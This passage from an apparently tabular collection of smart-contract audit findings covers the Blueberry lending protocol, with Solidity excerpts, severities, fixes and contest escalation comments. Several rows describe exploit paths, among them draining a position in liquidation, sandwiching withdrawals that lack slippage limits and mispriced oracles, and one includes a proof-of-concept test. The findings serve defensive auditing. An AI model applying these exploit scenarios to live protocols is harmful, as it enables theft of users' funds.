* share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n```\\n\\nHowever, the liquidator doesn't receive those shares ""inside the system"". 
Instead, they receive the softVault tokens that can be claimed directly for the underlying asset by calling `withdraw()`, which simply redeems the underlying tokens from the Compound fork and sends them to the user.\\n```\\nfunction withdraw(uint256 shareAmount)\\n external\\n override\\n nonReentrant\\n returns (uint256 withdrawAmount)\\n{\\n if (shareAmount == 0) revert ZERO_AMOUNT();\\n\\n _burn(msg.sender, shareAmount);\\n\\n uint256 uBalanceBefore = uToken.balanceOf(address(this));\\n if (cToken.redeem(shareAmount) != 0) revert REDEEM_FAILED(shareAmount);\\n uint256 uBalanceAfter = uToken.balanceOf(address(this));\\n\\n withdrawAmount = uBalanceAfter - uBalanceBefore;\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n uToken.safeTransfer(msg.sender, withdrawAmount);\\n\\n emit Withdrawn(msg.sender, withdrawAmount, shareAmount);\\n}\\n```\\n\\nNowhere in this process is `bank.totalLend` updated. As a result, each time there is a liquidation of size X, `bank.totalLend` will move X higher relative to the correct value. 
Slowly, over time, this value will begin to dramatically misrepresent the accurate amount that has been lent.\\nWhile there is no material exploit based on this inaccuracy at the moment, this is a core piece of data in the protocol, and it's inaccuracy could lead to major issues down the road.\\nFurthermore, it will impact immediate user behavior, as the Blueberry devs have explained ""we use that [value] to help us display TVL with subgraph"", which will deceive and confuse users.","Issue totalLend isn't updated on liquidation, leading to permanently inflated value\\nFor the best accuracy, updating `bank.totalLend` should happen from the `withdraw()` function in `SoftVault.sol` instead of from the core `BlueberryBank.sol` contract.\\nAlternatively, you could add an update to `bank.totalLend` in the `liquidate()` function, which might temporarily underrepresent the total lent before the liquidator withdrew the funds, but would end up being accurate over the long run.","A core metric of the protocol will be permanently inaccurate, giving users incorrect data to make their assessments on and potentially causing more severe issues down the road.",```\\nbank.totalLend += amount;\\n```\\n +"Complete debt size is not paid off for fee on transfer tokens, but users aren't warned",medium,"The protocol seems to be intentionally catering to fee on transfer tokens by measuring token balances before and after transfers to determine the value received. However, the mechanism to pay the full debt will not succeed in paying off the debt if it is used with a fee on transfer token.\\nThe protocol is clearly designed to ensure it is compatible with fee on transfer tokens. 
For example, all functions that receive tokens check the balance before and after, and calculate the difference between these values to measure tokens received:\\n```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n\\nThere is another feature of the protocol, which is that when loans are being repaid, the protocol gives the option of passing `type(uint256).max` to pay your debt in full:\\n```\\nif (amountCall == type(uint256).max) {\\n amountCall = oldDebt;\\n}\\n```\\n\\nHowever, these two features are not compatible. If a user paying off fee on transfer tokens passes in `type(uint256).max` to pay their debt in full, the full amount of their debt will be calculated. But when that amount is transferred to the contract, the amount that the result increases will be slightly less. As a result, the user will retain some balance that is not paid off.","I understand that it would be difficult to implement a mechanism to pay fee on transfer tokens off in full. That adds a lot of complexity that is somewhat fragile.\\nThe issue here is that the failure is silent, so that users request to pay off their loan in full, get confirmation, and may not realize that the loan still has an outstanding balance with interest accruing.\\nTo solve this, there should be a confirmation that any user who passes `type(uint256).max` has paid off their debt in full. 
Otherwise, the function should revert, so that users paying fee on transfer tokens know that they cannot use the ""pay in full"" feature and must specify the correct amount to get their outstanding balance down to zero.","The feature to allow loans to be paid in full will silently fail when used with fee on transfer tokens, which may trick users into thinking they have completely paid off their loans, and accidentally maintaining a balance.","```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n" +HardVault never deposits assets to Compound,medium,"While the protocol states that all underlying assets are deposited to their Compound fork to earn interest, it appears this action never happens in `HardVault.sol`.\\nThe documentation and comments seem to make clear that all assets deposited to `HardVault.sol` should be deposited to Compound to earn yield:\\n```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n\\nHowever, if we examine the code in these functions, there is no movement of the assets to Compound. 
Instead, they sit in the Hard Vault and don't earn any yield.","Either add the functionality to the Hard Vault to have the assets pulled from the ERC1155 and deposited to the Compound fork, or change the comments and docs to be clear that such underlying assets will not be receiving any yield.",Users who may expect to be earning yield on their underlying tokens will not be.,"```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n" +"Withdrawals from IchiVaultSpell have no slippage protection so can be frontrun, stealing all user funds",medium,"When a user withdraws their position through the `IchiVaultSpell`, part of the unwinding process is to trade one of the released tokens for the other, so the borrow can be returned. This trade is done on Uniswap V3. The parameters are set in such a way that there is no slippage protection, so any MEV bot could see this transaction, aggressively sandwich attack it, and steal the majority of the user's funds.\\nUsers who have used the `IchiVaultSpell` to take positions in Ichi will eventually choose to withdraw their funds. 
They can do this by calling `closePosition()` or `closePositionFarm()`, both of which call to `withdrawInternal()`, which follows loosely the following logic:\\nsends the LP tokens back to the Ichi vault for the two underlying tokens (one of which was what was borrowed)\\nswaps the non-borrowed token for the borrowed token on UniV3, to ensure we will be able to pay the loan back\\nwithdraw our underlying token from the Compound fork\\nrepay the borrow token loan to the Compound fork\\nvalidate that we are still under the maxLTV for our strategy\\nsend the funds (borrow token and underlying token) back to the user\\nThe issue exists in the swap, where Uniswap is called with the following function:\\n```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n\\nThe 4th variable is called `sqrtPriceLimitX96` and it represents the square root of the lowest or highest price that you are willing to perform the trade at. In this case, we've hardcoded in that we are willing to take the worst possible rate (highest price in the event we are trading 1 => 0; lowest price in the event we are trading 0 => 1).\\nThe `IchiVaultSpell.sol#uniswapV3SwapCallback()` function doesn't enforce any additional checks. 
It simply sends whatever delta is requested directly to Uniswap.\\n```\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n if (msg.sender != address(swapPool)) revert NOT_FROM_UNIV3(msg.sender);\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token0()).safeTransfer(\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token0()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token1()).safeTransfer(\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token1()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n }\\n }\\n}\\n```\\n\\nWhile it is true that there is an `amountRepay` parameter that is inputted by the user, it is not sufficient to protect users. Many users will want to make only a small repayment (or no repayment) while unwinding their position, and thus this variable will only act as slippage protection in the cases where users intend to repay all of their returned funds.\\nWith this knowledge, a malicious MEV bot could watch for these transactions in the mempool. 
When it sees such a transaction, it could perform a ""sandwich attack"", trading massively in the same direction as the trade in advance of it to push the price out of whack, and then trading back after us, so that they end up pocketing a profit at our expense.","Have the user input a slippage parameter to ensure that the amount of borrowed token they receive back from Uniswap is in line with what they expect.\\nAlternatively, use the existing oracle system to estimate a fair price and use that value in the `swap()` call.","Users withdrawing their funds through the `IchiVaultSpell` who do not plan to repay all of the tokens returned from Uniswap could be sandwich attacked, losing their funds by receiving very little of their borrowed token back from the swap.","```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n" +BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee,medium,"BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\n```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n\\nThis function is called in order to get fee from ICHI rewards, collected by farming. 
But currently it takes `bank.config().depositFee()` instead of `bank.config().withdrawFee()`.",Issue BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\nTake withdraw fee from rewards.,Wrong fee amount is taken.,"```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n" +ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswer,medium,"Chainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. 
This is exactly what happened to Venus on BSC when LUNA imploded.\\nChainlinkAdapterOracle uses the ChainlinkFeedRegistry to obtain the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData pulls the associated aggregator and requests round data from it. ChainlinkAggregators have minPrice and maxPrice circuit breakers built into them. This means that if the price of the asset drops below the minPrice, the protocol will continue to value the token at minPrice instead of it's actual value. This will allow users to take out huge amounts of bad debt and bankrupt the protocol.\\nExample: TokenA has a minPrice of $1. The price of TokenA drops to $0.10. The aggregator still returns $1 allowing the user to borrow against TokenA as if it is $1 which is 10x it's actual value.\\nNote: Chainlink oracles are used a just one piece of the OracleAggregator system and it is assumed that using a combination of other oracles, a scenario like this can be avoided. However this is not the case because the other oracles also have their flaws that can still allow this to be exploited. As an example if the chainlink oracle is being used with a UniswapV3Oracle which uses a long TWAP then this will be exploitable when the TWAP is near the minPrice on the way down. 
In a scenario like that it wouldn't matter what the third oracle was because it would be bypassed with the two matching oracles prices. If secondary oracles like Band are used a malicious user could DDOS relayers to prevent update pricing. Once the price becomes stale the chainlink oracle would be the only oracle left and it's price would be used.","Issue ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswer\\nChainlinkAdapterOracle should check the returned answer against the minPrice/maxPrice and revert if the answer is outside of the bounds:\\n```\\n (, int256 answer, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n+ if (answer >= maxPrice or answer <= minPrice) revert();\\n```\\n",In the event that an asset crashes (i.e. LUNA) the protocol can be manipulated to give out loans at an inflated price,"```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n" +WIchiFarm will break after second deposit of LP,medium,"WIchiFarm.sol makes the incorrect assumption that IchiVaultLP doesn't reduce allowance when using the transferFrom if allowance is set to type(uint256).max. Looking at a currently deployed IchiVault this assumption is not true. 
On the second deposit for the LP token, the call will always revert at the safe approve call.\\nIchiVault\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, ""ERC20: transfer amount exceeds allowance""));\\n return true;\\n }\\n```\\n\\nThe above lines show the transferFrom call which reduces the allowance of the spender regardless of whether the spender is approved for type(uint256).max or not.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAs a result after the first deposit the allowance will be less than type(uint256).max. When there is a second deposit, the reduced allowance will trigger a safeApprove call.\\n```\\nfunction safeApprove(\\n IERC20Upgradeable token,\\n address spender,\\n uint256 value\\n) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n ""SafeERC20: approve from non-zero to non-zero allowance""\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n}\\n```\\n\\nsafeApprove requires that either the input is zero or the current allowance is zero. Since neither is true the call will revert. The result of this is that WIchiFarm is effectively broken after the first deposit.","Only approve if current allowance isn't enough for call. Optionally add zero approval before the approve. 
Realistically it's impossible to use the entire type(uint256).max, but to cover edge cases you may want to add it.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n- ) != type(uint256).max\\n+ ) < amount\\n ) {\\n\\n+ IERC20Upgradeable(lpToken).safeApprove(\\n+ address(ichiFarm),\\n+ 0\\n );\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\n",WIchiFarm is broken and won't be able to process deposits after the first.,"```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, ""ERC20: transfer amount exceeds allowance""));\\n return true;\\n }\\n```\\n" +Liquidator can take all collateral and underlying tokens for a fraction of the correct price,high,"When performing liquidation calculations, we use the proportion of the individual token's debt they pay off to calculate the proportion of the liquidated user's collateral and underlying tokens to send to them. In the event that the user has multiple types of debt, the liquidator will be dramatically overpaid.\\nWhen a position's risk rating falls below the underlying token's liquidation threshold, the position becomes liquidatable. 
At this point, anyone can call `liquidate()` and pay back a share of their debt, and receive a proportionate share of their underlying assets.\\nThis is calculated as follows:\\n```\\nuint256 oldShare = pos.debtShareOf[debtToken];\\n(uint256 amountPaid, uint256 share) = repayInternal(\\n positionId,\\n debtToken,\\n amountCall\\n);\\n\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n\\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\\n}\\n```\\n\\nTo summarize:\\nThe liquidator inputs a debtToken to pay off and an amount to pay\\nWe check the amount of debt shares the position has on that debtToken\\nWe call `repayInternal()`, which pays off the position and returns the amount paid and number of shares paid off\\nWe then calculate the proportion of collateral and underlying tokens to give the liquidator\\nWe adjust the liquidated position's balances, and send the funds to the liquidator\\nThe problem comes in the calculations. The amount paid to the liquidator is calculated as:\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n```\\n\\nThese calculations are taking the total size of the collateral or underlying token. They are then multiplying it by `share / oldShare`. 
But `share / oldShare` is just the proportion of that one type of debt that was paid off, not of the user's entire debt pool.\\nLet's walk through a specific scenario of how this might be exploited:\\nUser deposits 1mm DAI (underlying) and uses it to borrow $950k of ETH and $50k worth of ICHI (11.8k ICHI)\\nBoth assets are deposited into the ETH-ICHI pool, yielding the same collateral token\\nBoth prices crash down by 25% so the position is now liquidatable (worth $750k)\\nA liquidator pays back the full ICHI position, and the calculations above yield `pos.collateralSize * 11.8k / 11.8k` (same calculation for the other two formulas)\\nThe result is that for 11.8k ICHI (worth $37.5k after the price crash), the liquidator got all the DAI (value $1mm) and LP tokens (value $750k)","Issue Liquidator can take all collateral and underlying tokens for a fraction of the correct price\\nAdjust these calculations to use `amountPaid / getDebtValue(positionId)`, which is accurately calculate the proportion of the total debt paid off.","If a position with multiple borrows goes into liquidation, the liquidator can pay off the smallest token (guaranteed to be less than half the total value) to take the full position, stealing funds from innocent users.","```\\nuint256 oldShare = pos.debtShareOf[debtToken];\\n(uint256 amountPaid, uint256 share) = repayInternal(\\n positionId,\\n debtToken,\\n amountCall\\n);\\n\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n\\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\\n}\\n```\\n" +The maximum size of an `ICHI` vault spell position can be arbitrarily surpassed,medium,"The maximum size of an `ICHI` vault spell 
position can be arbitrarily surpassed by subsequent deposits to a position due to a flaw in the `curPosSize` calculation.\\nIchi vault spell positions are subject to a maximum size limit to prevent large positions, ensuring a wide margin for liquidators and bad debt prevention for the protocol.\\nThe maximum position size is enforced in the `IchiVaultSpell.depositInternal` function and compared to the current position size `curPosSize`.\\nHowever, the `curPosSize` does not reflect the actual position size, but the amount of Ichi vault LP tokens that are currently held in the `IchiVaultSpell` contract (see L153).\\nAssets can be repeatedly deposited into an Ichi vault spell position using the `IchiVaultSpell.openPosition` function (via the `BlueBerryBank.execute` function).\\nOn the very first deposit, the `curPosSize` correctly reflects the position size. However, on subsequent deposits, the previously received Ichi `vault` LP tokens are kept in the `BlueBerryBank` contract. Thus, checking the balance of `vault` tokens in the `IchiVaultSpell` contract only accounts for the current deposit.\\nTest case\\nTo demonstrate this issue, please use the following test case:\\n```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n ).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(""should revert when exceeds max pos size due to increasing position"", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the 
line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(""EXCEED_MAX_POS_SIZE""); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(""should be able to return position risk ratio"", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n\\nRun the test with the following command:\\n```\\nyarn hardhat test --grep ""should revert when exceeds max pos size due to increasing position""\\n```\\n\\nThe test case fails and therefore shows that the maximum position size can be exceeded without reverting.",Consider determining the current position size using the `bank.getPositionValue()` function instead of using the current Ichi vault LP token balance.,"The maximum position size limit can be exceeded, leading to potential issues with liquidations and bad debt accumulation.","```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n 
).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(""should revert when exceeds max pos size due to increasing position"", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(""EXCEED_MAX_POS_SIZE""); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(""should be able to return position risk ratio"", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n" +"LP tokens cannot be valued because ICHI cannot be priced by oracle, causing all new open positions to revert",medium,"In order to value ICHI LP tokens, the oracle uses the Fair LP Pricing technique, which uses the prices of both individual tokens, along with the quantities, to calculate the LP token value. However, this process requires the underlying token prices to be accessible by the oracle. 
Both Chainlink and Band do not support the ICHI token, so the function will fail, causing all new positions using the IchiVaultSpell to revert.\\nWhen a new Ichi position is opened, the ICHI LP tokens are posted as collateral. Their value is assessed using the `IchiLpOracle#getPrice()` function:\\n```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n\\nThis function uses the ""Fair LP Pricing"" formula, made famous by Alpha Homora. To simplify, this uses an oracle to get the prices of both underlying tokens, and then calculates the LP price based on these values and the reserves.\\nHowever, this process requires that we have a functioning oracle for the underlying tokens. However, Chainlink and Band both do not support the ICHI token (see the links for their comprehensive lists of data feeds). As a result, the call to `base.getPrice(token0)` will fail.\\nAll prices are calculated in the `isLiquidatable()` check at the end of the `execute()` function. As a result, any attempt to open a new ICHI position and post the LP tokens as collateral (which happens in both `openPosition()` and openPositionFarm()) will revert.",There will need to be an alternate form of oracle that can price the ICHI token. 
The best way to accomplish this is likely to use a TWAP of the price on an AMM.,"All new positions opened using the `IchiVaultSpell` will revert when they attempt to look up the LP token price, rendering the protocol useless.\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nsherlock-admin\\nEscalate for 31 USDC\\nImpact stated is medium, since positions cannot be opened and no funds are at risk. The high severity definition as stated per Sherlock docs:\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nYou've created a valid escalation for 31 USDC!\\nTo remove the escalation from consideration: Delete your comment. To change the amount you've staked on this escalation: Edit your comment (do not create a new comment).\\nYou may delete or edit your escalation comment anytime before the 48-hour escalation window closes. 
After that, the escalation becomes final.\\nhrishibhat\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nsherlock-admin\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nThis issue's escalations have been accepted!\\nContestants' payouts and scores will be updated according to the changes made on this issue.","```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n" +onlyEOAEx modifier that ensures call is from EOA might not hold true in the future,medium,"modifier `onlyEOAEx` is used to ensure calls are only made from EOA. However, EIP 3074 suggests that using `onlyEOAEx` modifier to ensure calls are only from EOA might not hold true.\\nFor `onlyEOAEx`, `tx.origin` is used to ensure that the caller is from an EOA and not a smart contract.\\n```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n\\nHowever, according to EIP 3074,\\nThis EIP introduces two EVM instructions AUTH and AUTHCALL. The first sets a context variable authorized based on an ECDSA signature. 
